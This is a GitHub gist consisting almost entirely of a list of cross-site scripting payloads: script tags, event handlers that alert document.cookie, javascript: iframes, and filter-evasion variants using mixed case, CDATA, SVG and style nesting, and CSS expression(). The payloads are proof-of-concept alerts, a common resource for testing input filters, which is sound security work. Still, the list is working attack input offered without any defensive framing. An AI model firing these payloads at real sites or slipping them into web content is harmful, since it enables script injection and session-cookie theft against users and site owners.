'';!--"<XSS>=&{()}``\"
<script>alert(XSS);</script>
"><script>alert(XSS);</script>
<ScrIpt>alert(1);</SCript>
<a onmouseover="alert(document.cookie)">XSS</a>
<a onmouseover=alert(document.cookie)>XSS</a>
<<script>alert("XSS");//<</script>
<iframe src="javascript:alert('XSS');"></iframe>
<iframe src=# onmouseover="alert(document.cookie)"></iframe>
<img src="http://www.example.com/>"onerror="alert(document.cookie)//<">
<![CDATA["><script>alert("XSS")</script><!--]]>
";alert(document.domain)//
<SELECT NAME="" onmouseover=alert(XSS)></select>
<style><img src='</style><img src=x onerror=alert("XSS")//'>
<svg><style><img/src=x onerror=alert(XSS)// </b>
"><svg><script>alert(/1/.source)</script>
<div style="left:expression(alert('XSS'))">
<div style="left:expRessioN(alert('XSS'))">
Created
October 8, 2014 19:23
-
-
Save ntddk/063d92c815ed97c8e915 to your computer and use it in GitHub Desktop.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment